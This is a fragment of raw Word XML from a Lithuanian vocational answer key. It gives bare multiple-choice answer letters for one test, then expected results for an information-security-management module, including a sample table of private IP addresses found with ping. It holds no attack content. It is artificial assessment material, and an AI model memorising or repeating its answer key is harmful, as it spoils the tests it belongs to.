          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">TESTO </w:t>
      </w:r>
      <w:r w:rsidR="7DDDFCD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="0EAF7525" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="7DDDFCD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A549AF0" w14:textId="7E60BDF8" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1-C;</w:t>
      </w:r>
      <w:r w:rsidR="008261AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB52D1" w14:textId="420189B2" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2-A;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486D8AD" w14:textId="500C3B78" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3-A;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187AEB58" w14:textId="00524137" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4-A; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9A3EF" w14:textId="77777777" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5-A;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EADB35D" w14:textId="6E9C8D8E" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6-B;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE70AE" w14:textId="06EF71BC" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7-B; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C35C57" w14:textId="77777777" w:rsidR="001F36E6" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">8-A; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBA011" w14:textId="393581DA" w:rsidR="615E0537" w:rsidRPr="005A5C28" w:rsidRDefault="34B83E22" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9-A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290AF25" w14:textId="02CE3F79" w:rsidR="0061341E" w:rsidRPr="005A5C28" w:rsidRDefault="0061341E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F374FB5" w14:textId="5E296CF7" w:rsidR="0061341E" w:rsidRPr="005A5C28" w:rsidRDefault="77B26259" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Informacijos saugumo valdymas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19D433" w14:textId="77777777" w:rsidR="009F77D4" w:rsidRPr="005A5C28" w:rsidRDefault="009F77D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DCF763" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>INFORMACIJOS PAIEŠKA. RESURSŲ NAUDOJIMAS. SAVIKONTROLĖS UŽDUOTYS IR KLAUSIMAI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90113B" w14:textId="09AF1613" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="0056411F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0056411F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F4192" w14:textId="01FC0637" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521"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viri klausimai.</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mokiniai turėtų pateikti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>individual</w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F36E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atsakymus, paremtus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>asmenine patirtimi, žiniomis, supratimu, gebėjimais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E82942F" w14:textId="77777777" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6D141D" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KOMPIUTERIO KOMANDINĖJE EILUTĖJE NAUDODAMI ĮRANKĮ „PING“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽPILDYKITE PATEIKTĄ LENTELĘ. NURODYKITE NAUDOJAMO TINKLO IP ADRESUS IR GLAUSTAI APIBŪDINKITE ADRESO SAVININKĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A335E" w14:textId="2A0F3E27" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47648644" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF"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O PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="289A4061" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="767FAD86" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1B30F12E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FA14329" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Apibūdinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="33432D05" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A4A3D4" w14:textId="38C5659A" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="072DC6A6" w14:textId="55A21C13" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022A7E7D" w14:textId="2AA2831A" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="60D277B6" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3322E7B8" w14:textId="07D788D6" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D205296" w14:textId="44083F12" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0D2F0A" w14:textId="3D064187" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Stacionarus kompiuteris</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5BA1BDD5" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05475C3C" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAA187B" w14:textId="72A91C95" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2179E061" w14:textId="340CAD50" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nešiojamas kompiuteris</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0166BA5A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66FC70FD" w14:textId="5CBA6BB9" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D87873A" w14:textId="76C3921D" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="535BBCCC" w14:textId="2E56A7CA" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Išmanus telefonas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
